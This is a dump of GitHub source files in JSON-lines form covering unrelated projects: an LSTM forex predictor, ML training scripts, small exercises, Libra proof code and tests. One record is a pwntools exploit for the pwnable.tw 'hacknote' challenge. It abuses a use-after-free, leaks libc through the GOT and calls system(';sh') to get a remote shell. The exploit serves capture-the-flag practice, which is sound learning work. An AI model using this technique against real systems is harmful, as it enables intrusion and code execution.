st.form_submit_button('Login')\r\n \r\n# connect to MetaTrader 5\r\nif not mt5.initialize(server=\"MetaQuotes-Demo\", login=57154335, password=\"\"):\r\n    print(\"initialize() failed, error code =\",mt5.last_error())\r\n    mt5.shutdown()\r\n# st.write((mt5.terminal_info()))\r\n# st.write((mt5.version()))\r\neurgbp_rates = mt5.copy_rates_from_pos(\"EURGBP\", mt5.TIMEFRAME_M10, 0, 21)\r\n\r\nmt5.shutdown() \r\nst.write('Les données de prédiction sont chargées')\r\ndf = pd.DataFrame(eurgbp_rates)\r\n\r\n\r\n#Prepare Data\r\n\r\ndf.drop(['time', 'open', 'high', 'low', 'tick_volume', 'spread',\r\n       'real_volume'], axis=1, inplace = True)\r\n\r\n#st.dataframe(df)\r\ndata = list(df['close'])\r\nif st.checkbox('Voir les données'):\r\n    st.subheader('Les 20 dernières valeurs')\r\n    st.write(data)\r\n\r\n# preparing independent and dependent features\r\ndef prepare_data(timeseries_data, n_features):\r\n\tX, y =[],[]\r\n\tfor i in range(len(timeseries_data)):\r\n\t\t# find the end of this pattern\r\n\t\tend_ix = i + n_features\r\n\t\t# check if we are beyond the sequence\r\n\t\tif end_ix > len(timeseries_data)-1:\r\n\t\t\tbreak\r\n\t\t# gather input and output parts of the pattern\r\n\t\tseq_x, seq_y = timeseries_data[i:end_ix], timeseries_data[end_ix]\r\n\t\tX.append(seq_x)\r\n\t\ty.append(seq_y)\r\n\treturn np.array(X), np.array(y)\r\n\r\n#call the model\r\nn_steps, n_features = 20, 1\r\n# define model\r\nmodel = Sequential()\r\nmodel.add(LSTM(50, activation='relu', return_sequences=True, input_shape=(n_steps, n_features)))\r\nmodel.add(LSTM(50, activation='relu'))\r\nmodel.add(Dense(1))\r\nmodel.compile(optimizer='adam', loss='mse')\r\n\r\nmodel.load_weights('univ_v1_model.h5')\r\n\r\n# demonstrate prediction for next 10 candles\r\nx_input = np.array(data)\r\ntemp_input=list(x_input)\r\nlst_output=[]\r\ni=0\r\nn_steps=20\r\nn_features=1\r\nwhile(i<10):\r\n    \r\n    if(len(temp_input)>3):\r\n        x_input=np.array(temp_input[1:])\r\n        st.write(\"{} candle input {}\".format(i,x_input))\r\n        #print(x_input)\r\n        x_input = x_input.reshape((1, n_steps, n_features))\r\n        #print(x_input)\r\n        yhat = model.predict(x_input, verbose=0)\r\n        st.write(\"{} candle output {}\".format(i,yhat))\r\n        temp_input.append(yhat[0][0])\r\n        temp_input=temp_input[1:]\r\n        #print(temp_input)\r\n        lst_output.append(yhat[0][0])\r\n        i=i+1\r\n    else:\r\n        x_input = x_input.reshape((1, n_steps, n_features))\r\n        yhat = model.predict(x_input, verbose=0)\r\n        st.write(yhat[0])\r\n        temp_input.append(yhat[0][0])\r\n        lst_output.append(yhat[0][0])\r\n        i=i+1\r\n    \r\n# Output\r\nst.write(\"LA VALEUR A LA FERMETURE POUR LES 10 BOUGIES SUIVANTES:\")\r\nst.write(lst_output)\r\n\r\n# Visualizing The Output\r\nif st.checkbox('Show trend'):\r\n    st.subheader('Visualisation de la prediction')\r\n    st.write('La possible tendance de la prediction sur EUR/GBP est :')\r\n    #st.line_chart(lst_output)\r\n    image = Image.open('img.png')\r\n    st.image(image, caption='eurgbp trend')\r\n\r\n\r\n#st.line_chart(lst_output)","repo_name":"bolares/RB_CAPITAL","sub_path":"app1.py","file_name":"app1.py","file_ext":"py","file_size_in_byte":3672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
{"seq_id":"13485065421","text":"from pwn import *\n\nsh = remote('chall.pwnable.tw', 10102)\n# sh = process('./hacknote')\nelf = ELF('./hacknote')\n\nlibc = ELF('./libc_32.so.6')\n\ndef add_note(size, content):\n    sh.recvuntil('Your choice :')\n    sh.sendline('1')\n    sh.recvuntil('Note size :')\n    sh.sendline(str(size))\n    
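# --- Hedged illustration of prepare_data from the app1.py entry above.
# Despite its name, the n_features argument there is really the window
# length: each training pair is a window of consecutive closes plus the
# close that follows it. Toy data below, separate from the app itself.
import numpy as np

def make_windows(series, window):
    X, y = [], []
    for i in range(len(series) - window):
        X.append(series[i:i + window])
        y.append(series[i + window])
    return np.array(X), np.array(y)

closes = [1.0, 1.1, 1.2, 1.3, 1.4, 1.5]
X, y = make_windows(closes, 3)
# X[0] == [1.0, 1.1, 1.2] predicts y[0] == 1.3, and so on
print(X.shape, y.shape)        # (3, 3) (3,)
# for the LSTM above each window would then be reshaped to (samples, window, 1)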
sh.recvuntil('Content :')\n sh.sendline(str(content))\n\ndef delete_note(index):\n sh.recvuntil('Your choice :')\n sh.sendline('2')\n sh.recvuntil('Index :')\n sh.sendline(str(index))\n\ndef print_note(index):\n sh.recvuntil('Your choice :')\n sh.sendline('3')\n sh.recvuntil('Index :')\n sh.sendline(str(index))\n\nprint_puts = 0x0804862b\nputs_got = elf.got['puts']\n\nadd_note(20, 'aaaa')\nadd_note(20, 'aaaa')\ndelete_note(0)\ndelete_note(1)\n\nadd_note(0x8, p32(print_puts) + p32(puts_got))\nprint_note(0)\nputs_addr = u32(sh.recv(4))\n\nputs_libc = libc.symbols['puts']\nsys_libc = libc.symbols['system']\nsys_addr = puts_addr - puts_libc + sys_libc\n\ndelete_note(2)\nadd_note(0x8, p32(sys_addr) + ';sh\\x00')\nprint_note(0)\n\nsh.interactive()\nsh.close()","repo_name":"Coldwave96/PwnProjects","sub_path":"pwnable/hacknote/hacknote.py","file_name":"hacknote.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"11490850106","text":"\r\ndef main_func(list1,rows, columns):\r\n result=[] \r\n start = 0\r\n end = columns\r\n for i in range(rows): \r\n result.append(list1[start:end])\r\n start +=columns\r\n end += columns \r\n for i in result:\r\n for j in range(len(i)):\r\n print(i[j],' ',end='')\r\n print()\r\n\r\n\r\nn=int(input())\r\narr=[]\r\nfor i in range(n):\r\n for j in range(n):\r\n if(i == 0 or i == n - 1 or j == 0 or j == n - 1\r\n or i == j or j == (n - 1 - i)):\r\n a=arr.append('#')\r\n else:\r\n a=arr.append(' ')\r\nmain_func(arr, n, n)","repo_name":"Raghuram224/ZEST","sub_path":"Hacktober_day18.py","file_name":"Hacktober_day18.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"46842399701","text":"import argparse\nimport base64\nimport json\nimport logging\nimport os\n\nimport google.oauth2.credentials\nimport googleapiclient.http\n\nfrom google.oauth2 import service_account\nfrom googleapiclient.discovery import build\nfrom googleapiclient.errors import HttpError\nfrom google_auth_oauthlib.flow import InstalledAppFlow\n\nlogging.basicConfig(level=logging.INFO)\nLOGGER = logging.getLogger('cloudsearch.schema')\n\n# Scope grants [CLOUD SEARCH]\nSEARCH_SCOPES = ['https://www.googleapis.com/auth/cloud_search']\nSEARCH_API_SERVICE_NAME = 'cloudsearch'\nSEARCH_API_VERSION = 'v1'\n\n\ndef get_authenticated_service(service_account_file, scope, service_name, version):\n # Create credentials from Service Account File\n credentials = service_account.Credentials.from_service_account_file(\n service_account_file, scopes=scope)\n return build(service_name, version, credentials=credentials, cache_discovery=False)\n\n\ndef cloud_search_delete_schema(service, datasources):\n schema = service.indexing().datasources().deleteSchema(\n name=\"datasources/\"+datasources).execute()\n return schema\n\n\ndef main(service_account_file, datasources):\n # Create a service instance\n try:\n service_search = get_authenticated_service(\n service_account_file,\n SEARCH_SCOPES,\n SEARCH_API_SERVICE_NAME,\n SEARCH_API_VERSION)\n LOGGER.info(\"Delete schema - START\")\n # Delete Schema from the Datasource\n delete = cloud_search_delete_schema(service_search, datasources)\n LOGGER.info(\"Delete: %s\" % delete)\n LOGGER.info(\"Delete schema - END\")\n # Example code only. 
Add proper exception handling\n    except Exception as e:\n        LOGGER.error('Error %s' % e)\n\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser(\n        description='Example to handle CRUD for CloudSearch Schema.')\n    parser.add_argument('--service_account_file', dest='service_account_file',\n                        help='File name for the service account.')\n    parser.add_argument('--datasources', dest='datasources',\n                        help='DataSource to update.')\n\n    args = parser.parse_args()\n\n    main(args.service_account_file, args.datasources)\n","repo_name":"google-cloudsearch/connector-api-python","sub_path":"schema_delete.py","file_name":"schema_delete.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"51"}
{"seq_id":"72385338398","text":"from tkinter import *\nfrom tkinter import ttk\nfrom json import loads\nfrom requests import get\nfrom random import shuffle\n\n#\t\t\tred blue yellow green orange purple lime dark blue pink sand\nColors = [\"#FD7B7B\", \"#7F6AC2\", \"#FDE77B\", \"#69D869\", \"#FDC57B\", \"#A450A4\", \"#DFF477\", \"#5581A3\", \"#C6659C\", \"#F7C57D\"]\nAcColors = [\"#D14141\", \"#4A3490\", \"#D1B841\", \"#34A734\", \"#D19341\", \"#882A88\", \"#B2CA3F\", \"#306186\", \"#E3A5C8\", \"#FBD59E\"]\n\nBGColor = \"#F6FFB4\"\n\nURL = \"https://the-trivia-api.com/v2/questions\"\n\ncategory = \"science\"  # assumed default -- the original referenced 'category' without defining it\nquestions = loads(get(f\"{URL}?categories={category}\").text)\nprint(questions[0]['category'])\nQuestions, Answers, TrueAnswers = [],[],[]\nButtonArr = [0] * 4\nQuestionTextLabel = [0]\nAnswerBox = [0]*2\nQuestionNum = 0\nBoxesAmount = 1\nQuestionAmount = len(questions)\nAnswersAmount = len(questions[0][\"incorrectAnswers\"])+1\n\n# build the lists of questions and answers\ndef CreateFun():\n\tfor question in questions:\n\t\tQuestions.append(question[\"question\"][\"text\"])\n\t\tTrueAnswers.append(question[\"correctAnswer\"])\n\t\tanswers = question[\"incorrectAnswers\"]\n\t\tanswers.append(question[\"correctAnswer\"])\n\t\tshuffle(answers)\n\t\tAnswers.append(answers)\n\treturn Answers\n\nFalses = 0\nTrues = 0\n\n\n# who knows what this was for\n# if AnswersAmount % 4 == 0 and AnswersAmount > 8:\n# \tBoxesAmount = 4\n# elif AnswersAmount % 3 == 0 and AnswersAmount > 6:\n# \tBoxesAmount = 3\n# elif AnswersAmount % 2 == 0:\n# \tBoxesAmount = 2\n\n# increment the question number until they say amen\ndef NextQuestion():\n\tglobal QuestionNum\n\tglobal QuestionAmount\n\tif QuestionNum < QuestionAmount:\n\t\tQuestionNum += 1\n\treturn QuestionNum\n\n# check the user's answer\ndef AnswerVer(BText = None, QuNum = None):\n\tglobal QuestionNum\n\tglobal Trues\n\tglobal Falses\n\t# print(BText)\n\t# if BText != None:\n\t\t# print(f\"correct answer = {questions[QuestionNum-1]['correctAnswer']}\")\n\t\t# print(f\"text = {ButtonArr[BText]['text']}\")\n\ttry:\n\t\tif ButtonArr[BText]['text'] == questions[QuestionNum-1]['correctAnswer']:\n\t\t\tTrues += 1\n\t\telse:\n\t\t\tFalses += 1\n\texcept TypeError:\n\t\treturn Trues, Falses","repo_name":"DmitrHop/Faster-better-smarter","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"}
{"seq_id":"4390479434","text":"#!/usr/bin/env python3\n\ndef get_first_name(line):\n    name = \"\"\n    i = 0\n\n    while (i < line.index(\" is friends with \")):\n        name = name + line[i]\n        i = i + 1\n    return (name)\n\ndef get_last_name(line):\n    name = \"\"\n    i = line.index(\" is friends with \") + 17\n\n    while (i < 
len(line)):\n name = name + line[i]\n i = i + 1\n return (name)\n\ndef check_double(tmp, nameContent):\n i = 0\n\n while (i < len(nameContent)):\n if (nameContent[i] == tmp):\n return (0)\n i = i + 1\n return (-1)\n\ndef get_names(fileContent):\n i = 0\n nameContent = []\n\n while (i < len(fileContent)):\n tmp = get_first_name(fileContent[i])\n if (check_double(tmp, nameContent) == -1):\n nameContent.append(tmp)\n tmp = get_last_name(fileContent[i])\n if (check_double(tmp, nameContent) == -1):\n nameContent.append(tmp)\n i = i + 1\n nameContent.sort()\n return (nameContent)\n","repo_name":"tristan-guepeed/MathTek3","sub_path":"302/src/get_names.py","file_name":"get_names.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"19250572009","text":"import sys\n\nsys.stdin = open('input.txt')\n\nT = int(input())\n\nfor tc in range(1, T+1):\n N = int(input())\n arr = [[0]*N for _ in range(N)]\n num = 1\n di = [0, 1, 0, -1] # 우 하 좌 상\n dj = [1, 0, -1, 0]\n i = j = d = 0\n\n while True:\n if (0 <= i+di[d] < N and 0 <= j+dj[d] < N) and arr[i+di[d]][j+dj[d]] == 0:\n arr[i][j] = num\n i += di[d]\n j += dj[d]\n num += 1\n else:\n arr[i][j] = num\n d = (d+1)%4\n\n if N == 1 or num == N**2:\n arr[i][j] = num\n break\n\n print(f'#{tc}')\n for i in arr:\n print(*i)","repo_name":"Hyebin-You/TIL","sub_path":"algorithm problems/swea/1954_snail/1954_snail.py","file_name":"1954_snail.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"24155491109","text":"import math\n\nN = int(input())\n\npenalty = 0\ndist = []\nfor i in range(N):\n x, y = input().split()\n x = int(x)\n y = int(y)\n\n dist.append(math.hypot(x, y))\n\n for j in range(len(dist)):\n if dist[i] >= dist[j] and i != j:\n penalty += 1\n\nprint(penalty)\n","repo_name":"vinismarques/codigos-python","sub_path":"arco_flexa.py","file_name":"arco_flexa.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"17820896232","text":"from libra.account_address import Address\r\nfrom libra.account_state import AccountState\r\nfrom libra.account_state_blob import AccountStateBlob\r\nfrom libra.event import EventKey\r\nfrom libra.transaction import Version\r\nfrom libra.proof.definition import AccountStateProof\r\nfrom libra.rustlib import ensure\r\nfrom dataclasses import dataclass\r\nfrom typing import Optional, Tuple\r\nfrom canoser import Uint64\r\n\r\n\r\n@dataclass\r\nclass AccountStateWithProof:\r\n # The transaction version at which this account state is seen.\r\n version: Version\r\n # Blob value representing the account state. 
If this field is not set, it\r\n # means the account does not exist.\r\n blob: Optional[AccountStateBlob]\r\n # The proof the client can use to authenticate the value.\r\n proof: AccountStateProof\r\n\r\n @classmethod\r\n def from_proto(cls, proto):\r\n proof = AccountStateProof.from_proto(proto.proof)\r\n if len(proto.blob.__str__()) > 0:\r\n blob = AccountStateBlob.from_proto(proto.blob)\r\n else:\r\n blob = None\r\n return cls(proto.version, blob, proof)\r\n\r\n def verify(\r\n self,\r\n ledger_info,\r\n version,\r\n address\r\n ):\r\n ensure(\r\n self.version == version,\r\n \"State version ({}) is not expected ({}).\",\r\n self.version,\r\n version\r\n )\r\n self.proof.verify(ledger_info, version, Address.hash(address), self.blob)\r\n\r\n # Returns the `EventKey` (if existent) and number of total events for\r\n # an event stream specified by a query path.\r\n #\r\n # If the resource referred by the path that is supposed to hold the `EventHandle`\r\n # doesn't exist, returns (None, 0). While if the path is invalid, raises error.\r\n #\r\n # For example:\r\n # 1. if asked for DiscoverySetChange event from an ordinary user account,\r\n # this returns (None, 0)\r\n # 2. but if asked for a random path that we don't understand, it's an error.\r\n def get_event_key_and_count_by_query_path(\r\n self,\r\n path: bytes,\r\n ) -> Tuple[Optional[EventKey], Uint64]:\r\n if self.blob is not None:\r\n state = AccountState.deserialize(self.blob.blob)\r\n try:\r\n event_handle = state.get_event_handle_by_query_path(path)\r\n if event_handle is not None:\r\n return (event_handle.key, event_handle.count)\r\n except AttributeError:\r\n return (None, 0)\r\n else:\r\n return (None, 0)\r\n","repo_name":"guoyi03/libra-wallet","sub_path":"libra/proof/account_state_with_proof.py","file_name":"account_state_with_proof.py","file_ext":"py","file_size_in_byte":2523,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"34178283076","text":"import os\nimport warnings\nimport json\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom sklearn.metrics import accuracy_score, f1_score, classification_report\nfrom torch.utils.tensorboard import SummaryWriter\nfrom tqdm import tqdm\nfrom transformers import AlbertForTokenClassification, AdamW, get_linear_schedule_with_warmup\n\nimport training_params\nfrom dataset_loader import PunctuationDataset\nfrom utils import process_data, folder_with_time_stamps\nimport wandb\n\nwarnings.filterwarnings('ignore')\n\nlog_folder, checkpoint_folder, train_encoder_file_path = folder_with_time_stamps(training_params.LOG_DIR,\n training_params.CHECKPOINT_DIR)\nos.makedirs(log_folder, exist_ok=True)\nos.makedirs(checkpoint_folder, exist_ok=True)\n\nwriter = SummaryWriter(log_folder)\n\ntrain_sentences, train_labels, train_encoder, tag_values = process_data(training_params.TRAIN_DATA)\nvalid_sentences, valid_labels, _, _ = process_data(training_params.VALID_DATA)\n\nwith open(train_encoder_file_path, \"w\") as outfile:\n json.dump(train_encoder, outfile)\n\nprint(\"--------------------------------Tag Values----------------------------------\")\nprint(tag_values)\n\ntrain_dataset = PunctuationDataset(texts=train_sentences, labels=train_labels,\n tag2idx=train_encoder)\nvalid_dataset = PunctuationDataset(texts=valid_sentences, labels=valid_labels,\n tag2idx=train_encoder)\n\ntrain_data_loader = torch.utils.data.DataLoader(train_dataset, batch_size=training_params.BATCH_SIZE, num_workers=4)\nvalid_data_loader = 
torch.utils.data.DataLoader(valid_dataset, batch_size=training_params.BATCH_SIZE, num_workers=4)\n\nmodel = AlbertForTokenClassification.from_pretrained('ai4bharat/indic-bert',\n num_labels=len(train_encoder),\n output_attentions=False,\n output_hidden_states=False)\n\nif training_params.FULL_FINETUNING:\n param_optimizer = list(model.named_parameters())\n no_decay = ['bias', 'gamma', 'beta']\n optimizer_grouped_parameters = [\n {'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)],\n 'weight_decay_rate': 0.01},\n {'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)],\n 'weight_decay_rate': 0.0}\n ]\nelse:\n param_optimizer = list(model.classifier.named_parameters())\n optimizer_grouped_parameters = [{\"params\": [p for n, p in param_optimizer]}]\n\noptimizer = AdamW(\n optimizer_grouped_parameters,\n lr=training_params.LEARNING_RATE,\n eps=1e-8\n)\n\ntotal_steps = len(train_data_loader) * training_params.EPOCHS\nscheduler = get_linear_schedule_with_warmup(\n optimizer,\n num_warmup_steps=0,\n num_training_steps=total_steps\n)\n\nstarting_epoch = 0\n\nif training_params.LOAD_CHECKPOINT:\n checkpoint = torch.load(training_params.CHECKPOINT_PATH)\n model.load_state_dict(checkpoint['state_dict'])\n optimizer.load_state_dict(checkpoint['optimizer'])\n\n for state in optimizer.state.values():\n for k, v in state.items():\n if torch.is_tensor(v):\n state[k] = v.cuda()\n\n starting_epoch = checkpoint['epoch'] + 1\n\n\nif torch.cuda.device_count() > 1:\n print(\"Using \", torch.cuda.device_count(), \"GPUs\")\n model = nn.DataParallel(model)\n\nloss_values, validation_loss_values = [], []\nmodel.cuda()\n\nconfig = {\n \"learning_rate\": training_params.LEARNING_RATE,\n \"batch_size\": training_params.BATCH_SIZE,\n 'num_epochs': training_params.EPOCHS\n}\n\nwandb.init(project=\"test\", config=config)\nwandb.watch(model)\n\n\ntrain_step_count = 0\nfor epoch in range(starting_epoch, training_params.EPOCHS):\n\n model.train()\n total_loss = 0\n\n # Training loop\n tk0 = tqdm(train_data_loader, total=int(len(train_data_loader)), unit='batch')\n tk0.set_description(f'Epoch {epoch + 1}')\n\n for step, batch in enumerate(tk0):\n # add batch to gpu\n for k, v in batch.items():\n batch[k] = v.to(training_params.DEVICE)\n\n b_input_ids, b_input_mask, b_labels = batch['ids'], batch['mask'], batch['target_tag']\n\n model.zero_grad()\n\n outputs = model(b_input_ids, token_type_ids=None,\n attention_mask=b_input_mask, labels=b_labels)\n\n loss = outputs[0].mean()\n loss.backward()\n total_loss += loss.item()\n\n # loss for step\n writer.add_scalar(\"Training Loss- Step\", loss.sum(), train_step_count)\n wandb.log({'Training Loss - Step': loss.sum()}) \n train_step_count += 1\n\n torch.nn.utils.clip_grad_norm_(parameters=model.parameters(), max_norm=training_params.MAX_GRAD_NORM)\n\n optimizer.step()\n\n scheduler.step()\n\n # Calculate the average loss over the training data.\n avg_train_loss = total_loss / len(train_data_loader)\n print(\"Average train loss: {}\".format(avg_train_loss))\n writer.add_scalar(\"Training Loss\", avg_train_loss, epoch)\n wandb.log({'Training loss': avg_train_loss, 'epoch': epoch})\n\n state = {'epoch': epoch,\n 'state_dict': model.state_dict(),\n 'optimizer': optimizer.state_dict()}\n torch.save(state, checkpoint_folder + '/checkpoint_last.pt')\n # Store the loss value for plotting the learning curve.\n loss_values.append(avg_train_loss)\n\n model.eval()\n # Reset the validation loss for this epoch.\n eval_loss, eval_accuracy = 0, 
0\n nb_eval_steps, nb_eval_examples = 0, 0\n predictions, true_labels = [], []\n\n best_val_loss = np.inf\n\n for batch in tqdm(valid_data_loader, total=int(len(valid_data_loader)), unit='batch', leave=True):\n for k, v in batch.items():\n batch[k] = v.to(training_params.DEVICE)\n b_input_ids, b_input_mask, b_labels = batch['ids'], batch['mask'], batch['target_tag']\n\n with torch.no_grad():\n outputs = model(b_input_ids, token_type_ids=None,\n attention_mask=b_input_mask, labels=b_labels)\n logits = outputs[1].detach().cpu().numpy()\n label_ids = b_labels.to('cpu').numpy()\n\n # Calculate the accuracy for this batch of test sentences.\n eval_loss += outputs[0].mean().item()\n predictions.extend([list(p) for p in np.argmax(logits, axis=2)])\n true_labels.extend(label_ids)\n\n eval_loss = eval_loss / len(valid_data_loader)\n\n if eval_loss < best_val_loss:\n state = {'epoch': epoch,\n 'state_dict': model.state_dict(),\n 'optimizer': optimizer.state_dict()}\n torch.save(state, checkpoint_folder + '/checkpoint_best.pt')\n best_val_loss = eval_loss\n\n validation_loss_values.append(eval_loss)\n print(\"Validation loss: {}\".format(eval_loss))\n writer.add_scalar(\"Validation Loss\", eval_loss, epoch)\n\n wandb.log({'Validation loss': eval_loss})\n\n pred_tags = [tag_values[p_i] for p, l in zip(predictions, true_labels) for p_i, l_i in zip(p, l) if\n tag_values[l_i] != \"PAD\"]\n valid_tags = [tag_values[l_i] for l in true_labels for l_i in l if tag_values[l_i] != \"PAD\"]\n\n val_accuracy = accuracy_score(valid_tags, pred_tags)\n val_f1_score = f1_score(valid_tags, pred_tags, average='macro')\n print(\"Validation Accuracy: {}\".format(val_accuracy))\n print(\"Validation F1-Score: {}\".format(val_f1_score))\n print(\"Classification Report: {}\".format(classification_report(valid_tags, pred_tags, output_dict=True,\n labels=np.unique(pred_tags))))\n writer.add_scalar('Validation Accuracy', val_accuracy, epoch)\n writer.add_scalar('Validation F1 score', val_f1_score, epoch)\n wandb.log({'Validation Accuracy': val_accuracy})\n wandb.log({'Validation F1 Score': val_f1_score})","repo_name":"SukoonRS/punctuation-ITN","sub_path":"sequence_labelling/token_classification/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":7902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"51"} +{"seq_id":"43571747060","text":"from collections import namedtuple\nfrom typing import Sequence, Tuple, Dict, List, Union\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn.linear_model import LogisticRegressionCV\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.model_selection import BaseCrossValidator\nfrom sklearn.svm import l1_min_c\n\nfrom ..logging import get_logger\n\nlogger = get_logger(__name__)\n\nResult = namedtuple(\"Result\", [\"score\", \"reg_alpha\", \"is_neg\", \"min_weights\"])\nfeature = Union[str, int, float]\nf_list_type = List[feature]\n\n\ndef scorer(estimator, x_train, y):\n return roc_auc_score(y, estimator.predict_proba(x_train)[:, 1])\n\n\nclass PredefinedFolds(BaseCrossValidator):\n\n def __init__(self, cv_split: Dict[int, Tuple[Sequence[int], Sequence[int]]]):\n \"\"\"\n\n Args:\n cv_split:\n \"\"\"\n self.cv_split = cv_split\n\n def _iter_test_indices(self, x_train: np.ndarray = None, y: np.ndarray = None, groups: np.ndarray = None) -> np.ndarray:\n \"\"\"\n Generates integer indices corresponding to test sets\n\n Args:\n x_train:\n y:\n groups:\n\n Returns:\n\n \"\"\"\n for n in self.cv_split:\n yield self.cv_split[n][1]\n\n def 
get_n_splits(self, *args, **kwargs) -> int:\n return len(self.cv_split)\n\n\ndef analyze_result(clf: LogisticRegressionCV, features_names: Sequence[str],\n interpreted_model: bool = True) -> List[Result]:\n \"\"\"\n\n Args:\n clf:\n features_names:\n interpreted_model:\n\n Returns:\n\n \"\"\"\n scores = clf.scores_[1]\n cs_scores = scores.mean(axis=0)\n\n cs_len = scores.shape[1]\n coef_ = np.moveaxis(clf.coefs_paths_[1][:, :, :-1], 1, 0)\n\n if interpreted_model:\n cs_negs = (coef_.reshape((cs_len, -1)) <= 0).all(axis=1)\n else:\n cs_negs = [True] * cs_len\n\n cs_min_weights = [pd.Series(coef_[x].min(axis=0), index=features_names) # .sort_values()\n for x in range(cs_len)]\n\n results = [Result(score, c, is_neg, min_weights) for (score, c, is_neg, min_weights) in\n zip(cs_scores, clf.Cs, cs_negs, cs_min_weights)]\n\n return results\n\n\ndef l1_select(interpreted_model: bool,\n n_jobs: int,\n dataset: Tuple[pd.DataFrame, pd.Series],\n l1_grid_size: int,\n l1_exp_scale: float,\n cv_split: Dict[int, Tuple[Sequence[int], Sequence[int]]],\n auc_tol: float = 1e-4\n ) -> Tuple[f_list_type, Result]:\n \"\"\"\n \n Args:\n interpreted_model: \n n_jobs: \n dataset: \n l1_grid_size: \n l1_exp_scale: \n cv_split: \n auc_tol: \n\n Returns:\n\n \"\"\"\n # get grid for cs\n cs = l1_min_c(dataset[0], dataset[1], loss='log', fit_intercept=True) * np.logspace(0, l1_exp_scale, l1_grid_size)\n logger.info('C parameter range in [{0}:{1}], {2} values'.format(cs[0], cs[-1], l1_grid_size))\n # fit model with crossvalidation\n cv = PredefinedFolds(cv_split)\n clf = LogisticRegressionCV(Cs=cs,\n solver='saga',\n tol=1e-5,\n cv=cv,\n penalty='l1',\n scoring=scorer,\n intercept_scaling=10000.,\n max_iter=1000,\n n_jobs=n_jobs,\n random_state=42)\n\n clf.fit(dataset[0].values, dataset[1].values)\n\n # analyze cv results\n result = analyze_result(clf, dataset[0].columns, interpreted_model)\n\n # perform selection\n # filter bad weights models\n scores_neg = [x for x in result if x.is_neg]\n # get top score from avail models\n max_score = max([x.score for x in result])\n # get score with tolerance\n ok_score = max_score - auc_tol\n # select first model that is ok with tolerance\n res = None\n for res in scores_neg:\n if res.score >= ok_score:\n break\n\n # get selected features\n features_fit = [x for (x, y) in zip(dataset[0].columns, res.min_weights) if y != 0]\n logger.info(res)\n\n return features_fit, res\n","repo_name":"ivan-ustinov-idf/AutoScoringFramework","sub_path":"autoscoring/autowoe/lib/selectors/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4187,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"32868237064","text":"from Simulation.DisasterReader import DisasterReader\nimport unittest\nimport os\nimport re\n\nclass TestDisasterReader(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n # os.chdir('..\\..') #Disable for travis (needed for local run)\n cls.reports = {\n \"0\": [\"Test read with no special instances.\"],\n \"1\": [\"Test read with \", \" one special instance\"],\n \"2\": [\"Test at the end of the string \"],\n \"3\": [\"Test 14 \", \" is returned\"],\n \"4\": [\"Test \", \" sigfigs\"],\n \"5\": [\"Test \", \" multiple \",\" specials \"],\n \"6\": [\"Blank test\"],\n \"7\": [\"Blank test\"],\n \"8\": [\"Blank test\"],\n \"9\": [\"Blank test\"]\n }\n cls.ranges = {\n \"0\": [],\n \"1\": [1, 4, 2],\n \"2\": [.2, .4, .01],\n \"3\": [14, 15, 1],\n \"4\": [10, 20, .01],\n \"5\": [1, 10, .5, 1, 10, .5, 1, 10, 
.5],\n \"6\": [],\n \"7\": [],\n \"8\": [],\n \"9\": []\n }\n cls.answers = {\n \"0\": \"wait\",\n \"1\": \"wait\",\n \"2\": \"wait\",\n \"3\": \"wait\",\n \"4\": \"wait\",\n \"5\": \"wait\",\n \"6\": \"wait\",\n \"7\": \"wait\",\n \"8\": \"wait\",\n \"9\": \"wait\"\n }\n cls.file = 'test'\n os.chdir('Test') # So that test .json file is discovered (instead of top-level files)\n cls.disaster_reader = DisasterReader(cls.file)\n \n @classmethod\n def tearDownClass(cls):\n os.chdir('..')\n \n def test_runs(self):\n raised = False\n try:\n for i in range(len(TestDisasterReader.reports)):\n TestDisasterReader.disaster_reader.get_report(i)\n except:\n raised = True\n self.assertFalse(raised)\n \n def test_basic(self):\n string = TestDisasterReader.disaster_reader.get_report(0)\n self.assertEqual(string, TestDisasterReader.reports[\"0\"][0])\n \n def test_contains_no_bracket_string(self):\n for i in range(len(TestDisasterReader.reports)):\n test = TestDisasterReader.disaster_reader.get_report(i)\n for actual in TestDisasterReader.reports[str(i)]:\n self.assertTrue(actual in test)\n \n def test_num_in_ranges(self):\n for i in range(len(TestDisasterReader.reports)):\n test_string = TestDisasterReader.disaster_reader.get_report(i)\n actuals = TestDisasterReader.reports[str(i)]\n ranges = TestDisasterReader.ranges[str(i)]\n for split_num in range(len(actuals) - 1):\n num = float(test_string.split(actuals[split_num])[1].split(actuals[split_num + 1])[0])\n self.assertTrue(num >= ranges[split_num*3])\n self.assertTrue(num <= ranges[split_num*3 + 1])\n \nif __name__ == '__main__':\n 